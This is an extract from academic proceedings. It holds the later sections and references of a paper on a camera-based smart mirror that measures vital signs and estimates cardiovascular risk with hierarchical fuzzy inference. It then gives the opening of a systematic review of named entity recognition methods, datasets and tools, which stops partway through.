CVD includes different disorders that affect the cardiovascular system, such as coronary artery disease, cerebrovascular disease, heart attacks, and strokes. Three main factors can cause CVDs: unhealthy diets, excessive use of tobacco, and physical inactivity. Thus, one way to limit CVDs is to promote a healthy life, but prevention is equally important. On the one hand, promoting a healthy life means carrying out global policies that include, for example, taxing the consumption of high-sugar foods, building walking and cycle paths, and providing healthy school meals in children's classrooms. On the other hand, education is necessary to prevent CVD. In particular, citizens should be aware of the conditions suggesting the onset of an emergency.
Moreover, monitoring of heart rate, breathing rate, and blood oxygen saturation (the three vital parameters mainly involved in the cardiovascular process) is necessary to detect the worsening of the disease in time [1].
Usually two medical devices, such as electrocardiogram (ECG) and pulse oxime-
ter, are used to measure these parameters. ECG is a medical device that graphically
records the electrical activity of the heart and its rhythm. The measurements through
ECG require the presence of medical experts to manage the device. On the contrary,
pulse oximeter is a small device that is commonly used for acquiring the measure-
ments from the fingers. It is based on the photoplethysmography (PPG) technology
[2]. A light source is used to illuminate the tissue (e.g., skin) and a photodetector
to measure the small changes in light intensity associated with changes in blood
volume. Both the devices need to be in contact with the skin for a correct measure-
ment. In recent years, thanks to the advancement of technology in the field of digital cameras and image processing, the measurement of vital parameters through a new methodology, called remote photoplethysmography (rPPG), has become possible [3]. It is based on the same technology as PPG, but it uses a camera as a photodetector and the ambient light as a light source, thus avoiding contact. This characteristic allows new monitoring scenarios where there is no need for contact between the subject and the measurement devices; it also does not require the presence of medical experts, and
continuously acquired and then stored in databases accessed by medical staff only
[4–7].
This paper provides a synthetic description of the ongoing PhD research activity
of the author.
A non-contact vital signs monitoring system based on a see-through mirror has
been proposed. It is equipped with a camera that captures video frames of patients'
faces. The rPPG signals extracted from the video frames are processed for measuring
heart rate (HR), breathing rate (BR), blood oxygen saturation (SpO2) and the color of
lips. These data are used by a Hierarchical Fuzzy Inference System (HFIS), embedded
in the smart object, for cardiovascular risk level estimation. The goal is to create a
telemedicine solution for domestic use that is both cheap and easy to use.
The rest of the paper is organized as follows: a literature review on rPPG systems
and fuzzy inference systems for CVD is detailed in Sect. 2. From the analysis of the
state-of-the-art research five gaps are pointed out (Sect. 3), and the research goals are
outlined (Sect. 4). Three main hypotheses are then defined (Sect. 5). The proposed
methodology and the results are reported in Sects. 6 and 7. Finally, Sect. 8
concludes this work by outlining future directions.
2 Literature Review
Two main components are critical for the smart mirror that has been proposed:
the measurements module (through rPPG) and the inference system (through FIS).
The state-of-the-art methodologies for these two modules will be described in the
following, by highlighting their limits.
A pioneering work on rPPG was proposed by Verkruysse et al. [3], where it is
described how vital signals can be extracted through video images captured by a
camera. Moreover, Poh described how to use image processing techniques and blind
source separation to obtain the signal from the captured video frames [8]. Takano et
al. [9] have used a charge coupled device (CCD) camera for measuring heart rate and
respiratory rate from a person’s face. In [10], a Microsoft device KinectTM version
2.0 is used to capture vital parameters in real time, while in [11] the camera is used in a specific real-world context, namely the detection of car drivers' parameters. However, while these works provide non-invasive monitoring, they are difficult to apply in a real-world setting such as a smart home.
The first attempt at developing an easy-to-use solution, through the use of a mobile phone, is described in [12]. However, its use could be uncomfortable for elderly people, since they need continuous monitoring of their vital parameters and are often not used to modern technologies. An interesting solution that overcomes these limits
is proposed in [13], where a mirror for monitoring of semeiotic facial signals related
to cardio-metabolic risk is described, and it is shown how this daily object encourages
the users in improving their lifestyle. However, it consists of several sensors, which make it very difficult to install in a real domestic scenario. On the contrary, the proposed device is meant to overcome all the previously described issues. Indeed, a smart mirror has been developed that, thanks to a camera embedded in its structure, is able to acquire video frames of the subjects and thus derive the vital parameter measurements. As in [13], the choice of a common object enhances the users' willingness to use it; moreover, low-cost components have been used, and a ready-to-use smart object is proposed, thus avoiding hardware and software configurations.
Afterward, the collected data are sent to a Fuzzy Inference System (FIS) that returns the cardiovascular risk level. FISs have proven to be very useful and reliable in the medical field because of their ability to manage the uncertainty and vagueness that are inherent to this domain [14]. Thanks to their generality, they have been used as decision support systems for different diseases, such as diabetes [15], eye diseases [16], hypertension [17], and neurodegenerative diseases [18–20], just to mention a few.
With the aid of medical experts, a FIS for cardiovascular risk level estimation has been proposed in [21]. While the accuracy of the defined FIS was high, the number of rules grew exponentially with the number of input variables, hence the resulting rule base was quite complex. Reducing the number of rules is mandatory in order to improve interpretability [22]. So, in order to solve the "curse of dimensionality" that occurs in flat FISs, HFISs have been effectively used in several fields [23]. However, very few works use HFISs in the medical field. In [24], an HFIS is used to evaluate and measure the effects of rehabilitation in post-stroke patients, while in [25] one is used to diagnose dengue fever. Thus, the previous FIS has been improved by designing and implementing an HFIS for cardiovascular risk assessment.
3 Research Gaps
With regard to the two components described in Sect. 2, five main gaps have been
identified in state-of-the-art approaches:
G 1 : They are not suitable for daily use in a smart home scenario where the user easily adopts the device into his normal routine;
G 2 : The mirrors for parameters estimation do not measure blood oxygen saturation;
G 3 : Several telehealth systems for cardiovascular measurements have been proposed; however, they focus on the technical issues related to data privacy and communication, while ignoring the measurement of the parameters, which is performed with common devices;
G 4 : Fuzzy logic is suitable to describe medical concepts and reasoning about them.
However, the number of rules in flat FISs grows with the number of input vari-
ables, thus techniques for reducing their complexity are needed. To this aim,
HFISs have proven to be effective, however few works use them in the medical
domain, and none of them focus on cardiovascular disease;
G 5 : Usability and acceptability are two crucial issues when dealing with users who are not technicians, and they enhance users' trust in automatic devices. No existing works explore this aspect in smart objects for cardiovascular decision support systems.
4 Objectives
Starting from the research gaps that have been identified in the previous phase, five
research objectives have been defined.
O1 : Develop a contactless and easy-to-use smart device for cardiovascular risk
assessment, that can be used during the daily routine at home;
O2 : Develop a smart mirror that is able to measure four vital parameters, namely
heart rate, breath rate, blood oxygen saturation, and color of lips;
O3 : Embed the smart mirror in a telemedicine environment;
O4 : Define a Hierarchical Fuzzy Inference System for cardiovascular risk assess-
ment;
5 Hypothesis
On the basis of the research gaps and the research objectives, three main hypotheses have been defined; they will be verified in the following sections.
H1 : A smart mirror is able to accurately measure the four vital parameters, useful
to derive cardiovascular risks. The use of rPPG, together with signal and video
processing techniques, allows contactless measurements of the parameters;
H2 : Hierarchical fuzzy inference systems are suitable predictors of cardiovascular risk levels. Moreover, using HFISs instead of flat FISs reduces the number of rules;
H3 : The use of a common object, such as a mirror, improves the acceptability of the new technology to users, thus enhancing its use and its effectiveness for prevention.
6 Methodology
With regard to hypothesis H1, a smart mirror, shown in Fig. 1, has been developed
to acquire facial video frames used to extract the rPPG signal and then the four
vital parameters defined before. Cheap components have been used for the hardware
architecture: a monitor to show messages, acrylic film that is partially reflective and
transparent, a wood frame, and a camera [26, 27]. The current prototype is based on
a client/server architecture that is used for processing.
A software pipeline has then been defined to process the acquired video frames
and extract vital parameters values from signals.
The processing starts with real-time face identification from short video frames
acquired through the camera. A preliminary 26 s cycle is required to correct camera
distortion and then just 2 s are necessary for each measurement. Python libraries for
video and signal processing have been used: OpenCV to capture and process video frames, and Dlib with a pretrained frontal face detector to identify the area of the frame containing the face and a facial landmark predictor to obtain a set of 68 facial landmarks [28]. Then, three regions of interest (ROIs) are selected based on
their significance in blood passage modulation, and a fourth ROI is used to reduce
signal distortion due to facial movements.
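The subsequent per-ROI channel averaging can be sketched as below (a simplified stand-in: frames are nested lists rather than the OpenCV arrays the real pipeline uses, and the function name is ours):

```python
# rPPG preprocessing sketch: spatially average the R, G, B channels
# inside a rectangular ROI for every frame, yielding one 3-channel
# sample per frame (one row of the signal matrix).
def roi_signal(frames, roi):
    top, bottom, left, right = roi
    signal = []
    for frame in frames:            # frame: H x W x 3 nested lists
        pixels = [frame[y][x] for y in range(top, bottom) for x in range(left, right)]
        signal.append([sum(p[c] for p in pixels) / len(pixels) for c in range(3)])
    return signal
```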
The RGB signals coming from the ROIs are used to estimate the vital parameters.
Particularly, a signal matrix is obtained by averaging the pixels of each RGB channel and of each ROI.
2 https://pypi.org/project/opencv-python/.
3 http://dlib.net/.
4 http://dlib.net/imaging.html#shape_predictor.
Table 1 Mean absolute error and standard deviation obtained by comparing our contactless system and the pulse oximeter
        All subjects    Healthy subjects    Unhealthy subjects
HR      3.45 ± 2.93     2.87 ± 2.39         4.90 ± 3.74
SpO2    1.83 ± 2.43     1.54 ± 1.76         2.56 ± 3.63
Afterward, noise reduction techniques such as the Finite Impulse
Response filter [29], the chrominance method [30], and linear interpolation are used to obtain more robust signals. Finally, the most informative ROI is used to evaluate
the vital signals as suggested in [3, 8, 31]. Lip color was obtained by extracting and
analyzing a specific ROI that includes the mouth. K-means algorithm was applied
to quantify the predominant color in the ROI, from the resulting three main colors
in RGB format.
With respect to H2, an HFIS was developed starting from a flat FIS
rule base defined with the help of a clinician in [21]. The linguistic variables and
the related fuzzy sets have been modeled by using the FISDET tool [32]. The HFIS
consists of three FISs organized in a hierarchical fashion. Each FIS has two input
variables and one output variable. Intermediate input/output variables have been used
between the three levels. The final output is provided by the last layer, and it represents the cardiovascular risk level. Overall, the HFIS rule base includes 27 rules instead of the 81 defined in the flat FIS.
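The rule-count reduction can be worked out directly. Assuming three linguistic terms per variable (consistent with the paper's figures: a flat FIS over four inputs has 3^4 = 81 rules, and a chain of three 2-input FISs has 3 × 3^2 = 27):

```python
# Rule-count comparison between a flat FIS and a hierarchical chain of
# 2-input FISs, each input variable described by n_terms linguistic terms.
def flat_rules(n_inputs, n_terms=3):
    return n_terms ** n_inputs

def hierarchical_rules(n_inputs, n_terms=3):
    # (n_inputs - 1) two-input units, each contributing n_terms**2 rules
    return (n_inputs - 1) * n_terms ** 2
```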
With respect to H3, the Technology Acceptance Model (TAM) was used, and in vivo experiments have been conducted to evaluate the acceptability of the new technology to final users. A questionnaire was defined according to the TAM methodology, and users were asked to fill it in after having used the smart mirror [33].
7 Interpretation of Results
With regard to hypothesis H1, experiments have been conducted in order to verify the effectiveness of the proposed smart mirror in measuring the four vital parameters. The values of HR and SpO2 obtained with our system have been compared with those measured by a pulse oximeter, which is used as the baseline. Breath rate and lip color accuracy could not be evaluated, since there is no gold standard to compare them with. In vivo experiments were conducted in which subjects were required to sit in front of the mirror at a distance of about 50 cm. Measurements with the smart mirror and the pulse oximeter were conducted simultaneously, for a fair comparison. Results have shown that the two measurements are in agreement, since a good correlation is obtained [26].
Moreover, since blood oxygen saturation is a good marker for COVID-19 pres-
ence, further experiments have been conducted by considering only this parameter.
Also, in this case, a high level of agreement has been obtained between the system
measurements and the baseline [34].
With regard to the hypothesis H2 , experiments have been conducted to compare
the performance of the defined HFIS and its flat FIS version [21], in terms of accu-
racy and number of rules. A dataset of 116 subjects was collected and labeled by
experts, assigning a risk level (Low, Medium, High, Very High). A total of 12 HFIS configurations were first created by combining all the input variables. Then, the best HFIS was compared with the flat FIS, and overall accuracy values of 71.55% and 69.97% were obtained, respectively [35]. Table 2 shows the classification performance of both the FIS and the HFIS, for each risk level, in terms of accuracy (ACC), True Positive and True Negative Rate (TPR, TNR), and Positive and Negative Predictive Values (PPV, NPV). As an overall evaluation, we observe that the HFIS performs better for the extreme risk classes than the original FIS. In light of its better total accuracy, and given the greater importance of discriminating extreme classes in the cardiovascular disease domain, the HFIS has been preferred to the FIS. Moreover, as
previously said, the number of rules has been drastically reduced thus enhancing
the explainability of the inference system. With regard to H3 , 30 subjects have been
involved in the study through TAM. Six main research questions were identified regarding social and demographic factors, benefits, risks and privacy, and usability and acceptance, and for each of them a set of questions was defined according to the TAM guidelines. Results in Fig. 2 have shown a generally positive feeling toward our self-care monitoring solution, among both young and old people [33].
8 Conclusion
In this work, a smart mirror that is able to measure vital sign parameters from short
video frames of the user’s face has been developed. Moreover, a Hierarchical Fuzzy
Inference System has been designed with the aid of medical experts, in order to
automatically predict the cardiovascular risk level, from the analysis of the measured
parameters. Experiments have shown the effectiveness of the proposed approach in
both the measurement and predictive tasks. Moreover, since the stakeholders are not necessarily technicians, the acceptability of this new technology has been evaluated
through TAM and positive results have been collected.
Future work will address conducting large-scale experiments in hospitals and medical facilities in order to learn rules and fuzzy sets through a neuro-fuzzy system [36]. Moreover, a telemedicine system embedding the smart mirror will be developed, as defined in objective O3.
References
1. Cook, S., Togni, M., Schaub, M. C., Wenaweser, P., & Hess, O. M. (2006). High heart rate: A cardiovascular risk factor? European Heart Journal, 27(20), 2387–2393.
2. Allen, J. (2007). Photoplethysmography and its application in clinical physiological measure-
ment. Physiological Measurement, 28(3), R1.
3. Verkruysse, W., Svaasand, L. O., & Nelson, J. S. (2008). Remote plethysmographic imaging
using ambient light. Optics Express, 16(26), 21434–21445.
4. Alzubi, J., Manikandan, R., Alzubi, O., Gayathri, N., & Patan, R. (2019). A survey of specific IoT applications. International Journal on Emerging Technologies, 10(1), 47–53.
On the Design of a Smart Mirror for Cardiovascular … 815
5. Alzubi, J., Selvakumar, J., Alzubi, O., & Manikandan, R. (2019). Decentralized internet of
things. Indian Journal of Public Health Research and Development, 10(2), 251–254.
6. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
7. Abdulkareem, K. H., Mohammed, M. A., Salim, A., Arif, M., Geman, O., & Gupta, D., et al.
(2021). Realizing an effective covid-19 diagnosis system based on machine learning and iot in
smart hospital environment. IEEE Internet of Things Journal, 1–1.
8. Poh, M. Z., McDuff, D. J., & Picard, R. W. (2010). Non-contact, automated cardiac pulse mea-
surements using video imaging and blind source separation. Optics Express, 18(10), 10762–
10774.
9. Takano, C., & Ohta, Y. (2007). Heart rate measurement based on a time-lapse image. Medical
Engineering & Physics, 29(8), 853–857.
10. Bosi, I., Cogerino, C., & Bazzani, M. (2016). Real-time monitoring of heart rate by processing of
Microsoft Kinect™ 2.0 generated streams. In 2016 International Multidisciplinary Conference
on Computer and Energy Science (SpliTech) (pp. 1–6).
11. Zhang, Q., Wu, Q., Zhou, Y., Wu, X., Ou, Y., & Zhou, H. (2017). Webcam-based, non-contact,
real-time measurement for the physiological parameters of drivers. Measurement, 100, 311–
321.
12. Scully, C. G., Lee, J., Meyer, J., Gorbach, A. M., Granquist-Fraser, D., Mendelson, Y., et al.
(2012). Physiological parameter monitoring from optical recordings with a mobile phone. IEEE
Transactions on Biomedical Engineering, 59(2), 303–306.
13. Colantonio, S., Coppini, G., Germanese, D., Giorgi, D., Magrini, M., Marraccini, P., Martinelli,
M., Morales, M. A., Pascali, M. A., Raccichini, G., Righi, M., Salvetti, O. (2015). A smart
mirror to promote a healthy lifestyle. Biosystems Engineering, 138, pp. 33–43. Innovations in
Medicine and Healthcare.
14. Alonso, J. M., Castiello, C., Lucarelli, M., Mencar, C. (2013). Modeling interpretable fuzzy
rule-based classifiers for medical decision support. In Data mining: Concepts, methodologies,
tools, and applications, (pp. 1064–1081). IGI global
15. Lee, C., & Wang, M. (2011). A fuzzy expert system for diabetes decision support application.
IEEE Transactions on Systems, Man, and Cybernetics, Part B (Cybernetics), 41(1), 139–153
16. Ibrahim, F., Ali, J. B., Jaais, A. F., Taib, M. N. (2001). Expert system for early diagnosis of eye
diseases infecting the malaysian population. In Proceedings of IEEE Region 10 International
Conference on Electrical and Electronic Technology. TENCON 2001 (Cat. No.01CH37239).
Vol. 1. pp. 430–432.
17. Das, S., Ghosh, P., Kar, S. (2013). Hypertension diagnosis: A comparative study using fuzzy
expert system and neuro fuzzy system. In 2013 IEEE International Conference on Fuzzy
Systems (FUZZ-IEEE) (pp. 1–7)
18. Lella, E., & Vessio, G. (2020). Ensembling complex network ‘perspectives’ for mild cognitive
impairment detection with artificial neural networks. Pattern Recognition Letters, 136, 168–
174.
19. Vessio, G. (2019). Dynamic handwriting analysis for neurodegenerative disease assessment:
A literary review. Applied Sciences, 9(21), 4666.
20. Lella, E., Pazienza, A., Lofù, D., Anglani, R., & Vitulano, F. (2021). An ensemble learning
approach based on diffusion tensor imaging measures for alzheimer’s disease classification.
Electronics, 10(3), 249.
21. Casalino, G., Castellano, G., Castiello, C., Pasquadibisceglie, V., Zaza, G. (2019). A fuzzy
rule-based decision support system for cardiovascular risk assessment. In R. Fullér, S. Giove,
F. Masulli (Eds.), Fuzzy logic and applications, (pp. 97–108)
22. Mencar, C., Castellano, G., Fanelli, A. M. (2005). Some fundamental interpretability issues in
fuzzy modeling. In EUSFLAT Conference, pp. 100–105.
23. Kerr-Wilson, J., & Pedrycz, W. (2020). Generating a hierarchical fuzzy rule-based model.
Fuzzy Sets and Systems, 381, 124–139.
816 G. Zaza
24. Prokopowicz, P., Mikolajewski, D., Mikolajewska, E., & Tyburek, K. (2017). Modeling
trends in the hierarchical fuzzy system for multi-criteria evaluation of medical data. In
EUSFLAT/IWIFSGN.
25. Alrashoud, M. (2019). Hierarchical fuzzy inference system for diagnosing dengue disease.
In 2019 IEEE International Conference on Multimedia & Expo Workshops (ICMEW), (pp.
31–36).
26. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Contact-less real-time
monitoring of cardiovascular risk using video imaging and fuzzy inference rules. Information,
10(1), 9.
27. Pasquadibisceglie, V., Zaza, G., & Castellano, G. (2018). A personal healthcare system for
contact-less estimation of cardiovascular parameters. In AEIT International Annual Confer-
ence. IEEE, 2018, 1–6.
28. Kazemi, V., & Sullivan, J. (2014). One millisecond face alignment with an ensemble of regres-
sion trees. In 2014 IEEE Conference on Computer Vision and Pattern Recognition, pp. 1867–
1874
29. Speake, T., & Mersereau, R. (1981). A note on the use of windows for two-dimensional fir
filter design. IEEE Transactions on Acoustics, Speech, and Signal Processing, 29(1), 125–127.
30. De Haan, G., & Jeanne, V. (2013). Robust pulse rate from chrominance-based rppg. IEEE
Transactions on Biomedical Engineering, 60(10), 2878–2886.
31. Kong, L. K., et al. (2013). Non-contact detection of oxygen saturation based on visible light
imaging device using ambient light. Optics Express, 21(15), 17464–17471.
32. Castellano, G., Castiello, C., Pasquadibisceglie, V., & Zaza, G. (2017). Fisdet: Fuzzy inference
system development tool. International Journal of Computational Intelligence Systems, 10(1),
13–22.
33. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Evaluating end-user
perception towards a cardiac self-care monitoring process. In International Conference on
Wireless Mobile Communication and Healthcare (pp. 43–59). Springer.
34. Casalino, G., Castellano, G., & Zaza, G. (2020). A mhealth solution for contact-less self-
monitoring of blood oxygen saturation. In IEEE Symposium on Computers and Communica-
tions (ISCC). IEEE, 2020, 1–7.
35. Casalino, G., Grassi, R., Iannotta, M., Pasquadibisceglie, V., & Zaza, G. (2020). A hierarchical
fuzzy system for risk assessment of cardiovascular disease. In 2020 IEEE Conference on
Evolving and Adaptive Intelligent Systems (EAIS). IEEE (pp. 1–7)
36. Mencar, C., Castellano, G., & Fanelli, A. M. (2005). Deriving prediction intervals for neuro-
fuzzy networks. Mathematical and Computer Modelling, 42(7–8), 719–726.
Named Entity Recognition in Natural
Language Processing: A Systematic
Review
Abstract The enormous growth and availability of data poses a great challenge
for extracting useful information from documents written in natural language, and
information extraction has become a vital activity in all domains. The process
of identifying the names of organizations, people, locations, or other entities in text
is called named entity recognition (NER). It is a subtask of information extraction
and plays an important part in discovering and classifying names such as organization,
person, or location names. It is one of the trending fields and a most important step in
natural language processing (NLP) for text analysis, and research on NER has changed
considerably in the recent decade. NER can automatically examine entire articles and
reveal the people, organizations, and places mentioned in the text. Knowing the relevant
labels for each article helps in automatically organizing articles into well-characterized
hierarchies and supports smooth content discovery. The aim
of this paper is to present a survey on NER. Its prime contribution is a systematic
review of state-of-the-art NER according to the techniques used. The paper also
discusses tools, datasets, techniques, challenges, and future directions in the field of
NER, with the aim of providing researchers with substantial knowledge for further work.
1 Introduction
Named entity recognition (NER) is arguably the initial step toward information
extraction: it tries to locate and classify named entities in text into pre-defined
classes, for example, the names of people, locations, organizations, quantities,
monetary values, percentages, and so forth. NER is utilized in numerous fields of Natural
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 817
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_66
818 A. Sharma et al.
Language Processing (NLP). NER not only acts as a standalone tool but also plays
a very important role in various NLP applications such as speech recognition, chatbots,
sentiment analysis, text classification, and automatic summarization.
NER is also known as entity identification, entity extraction, or entity chunking.
It is an Artificial Intelligence capability that aims at the productivity of the
human mind: a system organized so that it is able to discover entity elements from
raw data and decide the class to which each element belongs. The objects identified
and classified in this way are called named entities (NEs). The notion of an NE
emerged in the context of NLP applications and is far from being linguistically
clear and settled.
The expression NE, widely used in information extraction (IE), question answering,
and other natural language processing applications, was coined in the Message
Understanding Conferences (MUC), which shaped IE research in the U.S.
in the 1990s. At that time, MUC focused on IE tasks in which structured
information about company activities and defense-related activities was extracted from
unstructured text, such as newspaper articles. In the course of system development,
researchers realized the importance of recognizing such information units, and
extracting these entities came to be regarded as one of the significant subtasks of IE.
As this task is relatively independent, it has been evaluated separately in several
different languages, for example Japanese, Chinese, and Spanish in the Multilingual
Entity Tracking venture. There have been several evaluation-based projects for NE,
such as one of the tasks of the Information Retrieval and Extraction Exercise (IREX)
in Japan [IREX HP], and the shared task at CoNLL in 2002 and 2003 for four languages:
English, German, Dutch, and Spanish [CoNLL HP]. In the IREX project, another
class, artifact, covering for example "Odyssey" as a book title or "Windows" as a
product name, was added to the original MUC classes. The NE task in MUC was
inherited by the ACE project in the U.S., where two new categories were included:
Geographical and Political Entities, for example "France" or "New York", and
Facility, for example "Empire State Building" [1].
Petasis et al. [2] restricted the meaning of named entities: "A NE is a proper
noun, serving as a name for someone or something". This restriction is justified by
the high proportion of proper nouns, places, or things present in the corpus.
"Named" limits the task to only those entities for which one or several rigid
designators stand for the referent. Rigid designators include proper names and
terms for certain natural kinds, such as biological species and substances.
Despite differing interpretations of NEs, researchers have reached rough agreement
on the types of NEs to recognize, for the most part separating NEs into
two classes: generic NEs and domain-specific NEs (e.g., proteins, chemicals, and
Over the last two decades, various topics have attracted critical attention, such as
Deep Learning (DL), because of its success in different areas. DL-based NER
approaches with minimal feature engineering have been growing. In recent years,
an extensive number of studies have applied deep learning techniques to NER and
progressively advanced state-of-the-art performance. This trend motivates us to
survey the current state of deep learning techniques in NER research. By contrasting
the choices of DL architectures, our objective is to identify factors influencing NER
performance as well as problems and challenges.
NER studies have been developing for a couple of decades, yet to the best of our
knowledge there are only a few surveys in this field so far. Apparently the
most established one was produced by Nadeau and Sekine [1] in 2007. Marrero et al. [4]
summarized NER work from the perspectives of fallacies, difficulties, issues,
and also opportunities as of 2013.
The aim of this paper is to present a survey of the various techniques and trends
in NER. The remainder of the paper is as follows. A detailed insight into the related
background of the aforementioned study is presented in the next section. Section 3
provides a systematic literature review of related work, Sect. 4 presents the
challenges and future directions, and finally the conclusion is in Sect. 5.
2 Related Background
2.1 NER
NER is arguably the initial step toward information extraction: it tries to locate
and classify named entities in text into pre-defined classes, for example, the names
of people, locations, organizations, quantities, monetary values, percentages, and so forth.
NER is utilized in numerous fields of NLP. It acts as an autonomous tool as well
as playing a very important role in various NLP applications such as speech recognition,
chatbots, sentiment analysis, text classification, and automatic summarization.
A tagged or labeled corpus is a collection of documents that includes annotations
of one or more entity types. Prior to 2005, datasets were mostly
developed by annotating news stories with a few entity types, suitable for coarse-
grained NER tasks. From then onwards, a large number of datasets were
created based on different types of content sources, including Wikipedia articles,
conversations, and user-generated content. The number of tag types has also become
significantly larger, e.g., 89 in OntoNotes [5]. Most ongoing NER efforts report
their performance on the CoNLL03 and OntoNotes datasets. The CoNLL [6] datasets
consist of newswire data in four European languages (Spanish, Dutch, English, and
German) labeled with four entity types (PER, LOC, ORG, MISC). OntoNotes is a more
challenging corpus, containing three languages that do not share scripts (Arabic,
Chinese, and English) and 18 NER types. The GENIA [7] corpus is also used for the
task of NER. OntoNotes has an enormous number of labeled elements; the objective
of the OntoNotes project was to annotate a large corpus, spanning categories such
as blogs and various news collections, with basic structural information (syntax and
predicate argument structure) and shallow semantics (word sense linked to an
ontology, and coreference). Another corpus used for the task of NER is MUC-6 [8].
This corpus contains 318 annotated Wall Street Journal articles, the scoring software,
and the corresponding documentation used in the MUC-6 evaluation. The importance
of the MUC-6 corpus and the MUC-6 Additional News Text is that they can be used
to replicate the evaluation.
There are various tools available online for English text. Some of the tools which
can be used for NER are: (i) Natural Language Toolkit (NLTK) [9], (ii) Polyglot
[10], (iii) Stanford CoreNLP [11], (iv) LingPipe [12], (v) AllenNLP [13], and (vi)
ScispaCy [14].
One tool which can be used for NER is NLTK, an open-source library for the
Python programming language. It is the most commonly used platform for working
with human language data in Python. NLTK provides more than 50 corpora and
various lexical resources, and also has libraries for classification, tokenization,
lemmatization, and chunking. It comes with a hands-on guide that introduces topics
in computational linguistics alongside programming basics for Python, which makes it
suitable for linguists who have no special background in programming, as well as for
developers and researchers who need to dive into computational linguistics.
Another tool in current use for NER is ScispaCy, an open-source software library
for advanced NLP. The ScispaCy NER component uses a word embedding strategy
based on sub-word features and Bloom embeddings, together with a 1D Convolutional
Neural Network (CNN). A Bloom embedding is similar to a word embedding but is a
more space-efficient representation; it gives each word a separate representation for
each particular context it appears in. The 1D CNN is then applied over the input text
to classify a sentence or word into a set of predetermined categories.
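ScispaCy's actual embedding layer lives inside spaCy's internals; the following is only a minimal, self-contained sketch of the hashing-trick idea behind Bloom embeddings. The table size, hash scheme, and word choices here are illustrative assumptions, not ScispaCy's real configuration:

```python
import hashlib

def bloom_embed(word, table, num_hashes=3):
    """Map a word onto a few rows of a small table via independent
    hashes and sum those rows (the 'hashing trick'): many words share
    rows, so the table can be far smaller than the vocabulary."""
    dim = len(table[0])
    vec = [0.0] * dim
    for seed in range(num_hashes):
        digest = hashlib.md5(f"{seed}:{word}".encode()).hexdigest()
        row = int(digest, 16) % len(table)
        vec = [v + t for v, t in zip(vec, table[row])]
    return vec

# Tiny illustrative table: 8 rows x 4 dimensions (made-up values).
table = [[(r + 1) * 0.1] * 4 for r in range(8)]
v1 = bloom_embed("protein", table)
v2 = bloom_embed("protein", table)
assert v1 == v2  # deterministic: the same word always gets the same vector
print(len(v1))   # 4
```

In a trained model the table rows are learned parameters; here they are fixed numbers purely to show the lookup-and-sum mechanism.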
There are various steps in NER, such as tokenization, lemmatization, Part-of-Speech
(POS) tagging, and chunking, which can be done using any of these tools. The
steps are:
(i) Tokenization: The basic tokenizer splits the text into sentences and each sentence
into tokens. For example, the sentence "he is playing cricket" is split into the tokens
['he', 'is', 'playing', 'cricket'].
(ii) Lemmatization: Lemmatization is the process in which a word is converted to
its root form, like caring to care or playing to play. Lemmatization identifies
the root or base form of a word, whereas stemming just cuts off an affix such as "ing",
which makes a huge difference: a stem might not be a real or actual
word, but a lemma always is. In lemmatization, 'Caring' converts to
'care', whereas in stemming 'Caring' converts to 'car'.
(iii) POS Tagging: POS tagging reads the text and assigns a tag to
each and every word. Tagging is a sort of classification that may be characterized as
the automatic assignment of a descriptor to each token. The descriptor is called a tag and
may represent a part of speech, semantic information, etc. For example, the
sentence "he is playing cricket" is tagged as [('he', 'PRP'), ('is', 'VBZ'), ('playing',
'VBG'), ('cricket', 'NN')].
(iv) Chunking: Chunking is also known as chunk extraction or shallow parsing.
It is the method of extracting meaningful short phrases from a sentence that has been
tagged with POS, adding structure to the tagged sentence. In shallow parsing or
chunking there is at most one level between the root and the leaves, whereas deep
parsing consists of more than one level.
The primary usage of chunking is to form groups of noun phrases, combining the parts
of speech with regular expressions. There are no predefined rules for
chunking, but rules can be made as per the need or the requirements.
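The tokenization and lemmatization-versus-stemming behavior described in these steps can be sketched in plain Python. The tiny lemma dictionary and the naive "ing"-stripping rule below are illustrative stand-ins for real resources such as NLTK's WordNetLemmatizer and PorterStemmer:

```python
# Toy lemma dictionary; real lemmatizers consult a full lexicon.
LEMMAS = {"playing": "play", "caring": "care", "is": "be"}

def tokenize(sentence):
    """Whitespace tokenization, the simplest possible tokenizer."""
    return sentence.split()

def lemmatize(token):
    """Dictionary lookup to the base form; unknown words pass through."""
    return LEMMAS.get(token, token)

def stem(token):
    """Blindly cutting 'ing' can produce non-words: caring -> car."""
    return token[:-3] if token.endswith("ing") else token

tokens = tokenize("he is playing cricket")
print(tokens)                           # ['he', 'is', 'playing', 'cricket']
print([lemmatize(t) for t in tokens])   # ['he', 'be', 'play', 'cricket']
print(stem("caring"), lemmatize("caring"))  # car care
```

The last line reproduces the stem/lemma contrast from step (ii): the stem "car" is not a real word, while the lemma "care" is.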
Several earlier IE and NER systems are based on hand-crafted rules [1]. These
systems employ domain-specific features to identify and classify NEs using
syntactic-lexical patterns and series of hand-crafted grammatical rules written by
computational linguists. Such rules work well for extracting information that follows
specific patterns; the main drawbacks are that they are domain-specific and
time-consuming due to the manual construction of the rules.
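A minimal illustration of such a hand-crafted-rule system might look like the sketch below. The gazetteer entries and the title pattern are hypothetical examples, far simpler than the rule sets built by computational linguists:

```python
import re

# Hypothetical gazetteer (known names with fixed labels) and a
# syntactic-lexical pattern (an honorific followed by a capitalized word).
GAZETTEER = {"New York": "LOC", "Wall Street Journal": "ORG"}
TITLE = re.compile(r"\b(Mr|Ms|Dr)\. ([A-Z][a-z]+)")

def rule_based_ner(text):
    """Apply gazetteer lookups, then pattern rules, collecting entities."""
    entities = []
    for name, label in GAZETTEER.items():
        for m in re.finditer(re.escape(name), text):
            entities.append((m.group(), label))
    for m in TITLE.finditer(text):
        entities.append((m.group(2), "PER"))
    return entities

print(rule_based_ner("Dr. Smith moved to New York."))
# [('New York', 'LOC'), ('Smith', 'PER')]
```

The sketch also shows the stated drawback: every new domain needs new gazetteer entries and new patterns, written and maintained by hand.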
Däniken and Cieliebak [24] extended the work of Yang et al. to allow joint training
on informal corpora and to incorporate sentence-level feature representations;
their system took second place at the WNUT 2017 shared task for NER. Zhao
